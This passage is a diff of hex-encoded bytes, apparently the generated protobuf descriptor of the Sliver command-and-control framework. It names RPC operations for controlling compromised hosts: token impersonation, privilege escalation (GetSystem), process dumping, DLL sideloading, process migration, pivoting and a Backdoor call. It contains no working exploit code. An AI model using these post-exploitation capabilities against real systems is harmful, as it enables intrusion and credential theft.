- 0x72, 0x70, 0x62, 0x2e, 0x52, 0x75, 0x6e, 0x41, 0x73, 0x12, 0x3e, 0x0a, 0x0b, 0x49, 0x6d, 0x70,
- 0x65, 0x72, 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x49, 0x6d, 0x70, 0x65, 0x72, 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65, 0x52,
- 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49, 0x6d,
- 0x70, 0x65, 0x72, 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65, 0x12, 0x38, 0x0a, 0x09, 0x52, 0x65, 0x76,
- 0x54, 0x6f, 0x53, 0x65, 0x6c, 0x66, 0x12, 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x52, 0x65, 0x76, 0x54, 0x6f, 0x53, 0x65, 0x6c, 0x66, 0x52, 0x65, 0x71, 0x1a, 0x13,
- 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x76, 0x54, 0x6f, 0x53,
- 0x65, 0x6c, 0x66, 0x12, 0x38, 0x0a, 0x09, 0x47, 0x65, 0x74, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d,
- 0x12, 0x16, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x53,
- 0x79, 0x73, 0x74, 0x65, 0x6d, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x12, 0x29, 0x0a,
- 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x65, 0x71, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x27, 0x0a, 0x03, 0x4d, 0x73, 0x66, 0x12,
- 0x10, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x4d, 0x53, 0x46, 0x52, 0x65,
- 0x71, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73,
- 0x6b, 0x12, 0x33, 0x0a, 0x09, 0x4d, 0x73, 0x66, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x12, 0x16,
- 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x4d, 0x53, 0x46, 0x52, 0x65, 0x6d,
- 0x6f, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x4a, 0x0a, 0x0f, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74,
- 0x65, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79, 0x12, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76,
- 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x41, 0x73, 0x73, 0x65,
- 0x6d, 0x62, 0x6c, 0x79, 0x52, 0x65, 0x71, 0x1a, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62,
- 0x6c, 0x79, 0x12, 0x32, 0x0a, 0x07, 0x4d, 0x69, 0x67, 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e,
- 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x4d, 0x69, 0x67, 0x72, 0x61, 0x74, 0x65,
- 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d,
- 0x69, 0x67, 0x72, 0x61, 0x74, 0x65, 0x12, 0x32, 0x0a, 0x07, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74,
- 0x65, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65,
- 0x63, 0x75, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x12, 0x40, 0x0a, 0x0e, 0x45, 0x78,
- 0x65, 0x63, 0x75, 0x74, 0x65, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x12, 0x1b, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x57,
- 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76,
- 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x12, 0x35, 0x0a, 0x08,
- 0x53, 0x69, 0x64, 0x65, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x53, 0x69, 0x64, 0x65, 0x6c, 0x6f, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a,
- 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x69, 0x64, 0x65, 0x6c,
- 0x6f, 0x61, 0x64, 0x12, 0x3b, 0x0a, 0x08, 0x53, 0x70, 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c, 0x12,
- 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49, 0x6e, 0x76, 0x6f, 0x6b,
- 0x65, 0x53, 0x70, 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x70, 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c,
- 0x12, 0x3b, 0x0a, 0x0a, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6e, 0x73, 0x68, 0x6f, 0x74, 0x12, 0x17,
+ 0x65, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x73, 0x12, 0x3e, 0x0a, 0x0b, 0x4d, 0x65, 0x6d, 0x66, 0x69,
+ 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64, 0x52, 0x65, 0x71,
+ 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66,
+ 0x69, 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64, 0x12, 0x3b, 0x0a, 0x0a, 0x4d, 0x65, 0x6d, 0x66, 0x69,
+ 0x6c, 0x65, 0x73, 0x52, 0x6d, 0x12, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x52, 0x6d, 0x52, 0x65, 0x71, 0x1a, 0x14,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c,
+ 0x65, 0x73, 0x52, 0x6d, 0x12, 0x2c, 0x0a, 0x05, 0x4d, 0x6f, 0x75, 0x6e, 0x74, 0x12, 0x12, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x6f, 0x75, 0x6e, 0x74, 0x52, 0x65,
+ 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x6f, 0x75,
+ 0x6e, 0x74, 0x12, 0x3e, 0x0a, 0x0b, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x44, 0x75, 0x6d,
+ 0x70, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x72, 0x6f,
+ 0x63, 0x65, 0x73, 0x73, 0x44, 0x75, 0x6d, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x44, 0x75,
+ 0x6d, 0x70, 0x12, 0x2c, 0x0a, 0x05, 0x52, 0x75, 0x6e, 0x41, 0x73, 0x12, 0x12, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x75, 0x6e, 0x41, 0x73, 0x52, 0x65, 0x71, 0x1a,
+ 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x75, 0x6e, 0x41, 0x73,
+ 0x12, 0x3e, 0x0a, 0x0b, 0x49, 0x6d, 0x70, 0x65, 0x72, 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65, 0x12,
+ 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49, 0x6d, 0x70, 0x65, 0x72,
+ 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49, 0x6d, 0x70, 0x65, 0x72, 0x73, 0x6f, 0x6e, 0x61, 0x74, 0x65,
+ 0x12, 0x38, 0x0a, 0x09, 0x52, 0x65, 0x76, 0x54, 0x6f, 0x53, 0x65, 0x6c, 0x66, 0x12, 0x16, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x76, 0x54, 0x6f, 0x53, 0x65,
+ 0x6c, 0x66, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x52, 0x65, 0x76, 0x54, 0x6f, 0x53, 0x65, 0x6c, 0x66, 0x12, 0x38, 0x0a, 0x09, 0x47, 0x65,
+ 0x74, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x12, 0x16, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74,
+ 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x52, 0x65, 0x71, 0x1a,
+ 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x47, 0x65, 0x74, 0x53, 0x79,
+ 0x73, 0x74, 0x65, 0x6d, 0x12, 0x29, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x11, 0x2e, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x65, 0x71, 0x1a,
+ 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x12,
+ 0x27, 0x0a, 0x03, 0x4d, 0x73, 0x66, 0x12, 0x10, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x4d, 0x53, 0x46, 0x52, 0x65, 0x71, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x33, 0x0a, 0x09, 0x4d, 0x73, 0x66, 0x52,
+ 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x12, 0x16, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62,
+ 0x2e, 0x4d, 0x53, 0x46, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x0e, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x4a, 0x0a,
+ 0x0f, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79,
+ 0x12, 0x1c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63,
+ 0x75, 0x74, 0x65, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79, 0x52, 0x65, 0x71, 0x1a, 0x19,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74,
+ 0x65, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79, 0x12, 0x32, 0x0a, 0x07, 0x4d, 0x69, 0x67,
+ 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e,
+ 0x4d, 0x69, 0x67, 0x72, 0x61, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x69, 0x67, 0x72, 0x61, 0x74, 0x65, 0x12, 0x32, 0x0a,
+ 0x07, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x11,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74,
+ 0x65, 0x12, 0x40, 0x0a, 0x0e, 0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x57, 0x69, 0x6e, 0x64,
+ 0x6f, 0x77, 0x73, 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45,
+ 0x78, 0x65, 0x63, 0x75, 0x74, 0x65, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x52, 0x65, 0x71,
+ 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x78, 0x65, 0x63,
+ 0x75, 0x74, 0x65, 0x12, 0x35, 0x0a, 0x08, 0x53, 0x69, 0x64, 0x65, 0x6c, 0x6f, 0x61, 0x64, 0x12,
+ 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x69, 0x64, 0x65, 0x6c,
+ 0x6f, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x53, 0x69, 0x64, 0x65, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x3b, 0x0a, 0x08, 0x53, 0x70,
+ 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c, 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x49, 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x53, 0x70, 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c,
+ 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53,
+ 0x70, 0x61, 0x77, 0x6e, 0x44, 0x6c, 0x6c, 0x12, 0x3b, 0x0a, 0x0a, 0x53, 0x63, 0x72, 0x65, 0x65,
+ 0x6e, 0x73, 0x68, 0x6f, 0x74, 0x12, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6e, 0x73, 0x68, 0x6f, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x14,
0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6e,
- 0x73, 0x68, 0x6f, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6e, 0x73, 0x68, 0x6f, 0x74, 0x12, 0x50, 0x0a,
- 0x11, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x4f, 0x77, 0x6e,
- 0x65, 0x72, 0x12, 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x75,
- 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x4f, 0x77, 0x6e, 0x65, 0x72, 0x52,
- 0x65, 0x71, 0x1a, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x75,
- 0x72, 0x72, 0x65, 0x6e, 0x74, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x4f, 0x77, 0x6e, 0x65, 0x72, 0x12,
- 0x35, 0x0a, 0x08, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x12, 0x15, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x52,
- 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65,
- 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x12, 0x44, 0x0a, 0x0d, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,
- 0x65, 0x44, 0x65, 0x74, 0x61, 0x69, 0x6c, 0x12, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x44, 0x65, 0x74, 0x61, 0x69, 0x6c,
- 0x52, 0x65, 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53,
- 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x44, 0x65, 0x74, 0x61, 0x69, 0x6c, 0x12, 0x4c, 0x0a, 0x12,
- 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x42, 0x79, 0x4e, 0x61,
- 0x6d, 0x65, 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x74,
- 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x42, 0x79, 0x4e, 0x61, 0x6d, 0x65,
- 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53,
- 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x4e, 0x0a, 0x12, 0x50, 0x69,
- 0x76, 0x6f, 0x74, 0x53, 0x74, 0x61, 0x72, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72,
- 0x12, 0x1f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f,
- 0x74, 0x53, 0x74, 0x61, 0x72, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65,
- 0x71, 0x1a, 0x17, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76,
- 0x6f, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12, 0x44, 0x0a, 0x11, 0x50, 0x69,
- 0x76, 0x6f, 0x74, 0x53, 0x74, 0x6f, 0x70, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x12,
- 0x1e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74,
- 0x53, 0x74, 0x6f, 0x70, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x52, 0x65, 0x71, 0x1a,
- 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79,
- 0x12, 0x4e, 0x0a, 0x15, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e,
- 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73, 0x12, 0x1b, 0x2e, 0x73, 0x6c, 0x69, 0x76,
- 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e,
- 0x65, 0x72, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x73,
- 0x12, 0x33, 0x0a, 0x0a, 0x50, 0x69, 0x76, 0x6f, 0x74, 0x47, 0x72, 0x61, 0x70, 0x68, 0x12, 0x0f,
- 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a,
- 0x14, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x76, 0x6f, 0x74,
- 0x47, 0x72, 0x61, 0x70, 0x68, 0x12, 0x40, 0x0a, 0x0c, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65,
- 0x72, 0x76, 0x69, 0x63, 0x65, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x53, 0x74, 0x61, 0x72, 0x74, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x52, 0x65, 0x71,
- 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76,
- 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x3e, 0x0a, 0x0b, 0x53, 0x74, 0x6f, 0x70, 0x53,
- 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x53, 0x74, 0x6f, 0x70, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x52, 0x65, 0x71,
- 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x72, 0x76,
- 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x42, 0x0a, 0x0d, 0x52, 0x65, 0x6d, 0x6f, 0x76,
- 0x65, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x12, 0x1a, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,
- 0x65, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x38, 0x0a, 0x09, 0x4d,
- 0x61, 0x6b, 0x65, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x12, 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x61, 0x6b, 0x65, 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x52, 0x65, 0x71,
- 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x61, 0x6b, 0x65,
- 0x54, 0x6f, 0x6b, 0x65, 0x6e, 0x12, 0x2d, 0x0a, 0x06, 0x47, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12,
- 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x6e, 0x76, 0x52, 0x65,
- 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x45, 0x6e, 0x76,
- 0x49, 0x6e, 0x66, 0x6f, 0x12, 0x2f, 0x0a, 0x06, 0x53, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x13,
- 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53, 0x65, 0x74, 0x45, 0x6e, 0x76,
- 0x52, 0x65, 0x71, 0x1a, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x53,
- 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x35, 0x0a, 0x08, 0x55, 0x6e, 0x73, 0x65, 0x74, 0x45, 0x6e,
- 0x76, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x55, 0x6e, 0x73,
- 0x65, 0x74, 0x45, 0x6e, 0x76, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x55, 0x6e, 0x73, 0x65, 0x74, 0x45, 0x6e, 0x76, 0x12, 0x35, 0x0a, 0x08,
- 0x42, 0x61, 0x63, 0x6b, 0x64, 0x6f, 0x6f, 0x72, 0x12, 0x15, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e,
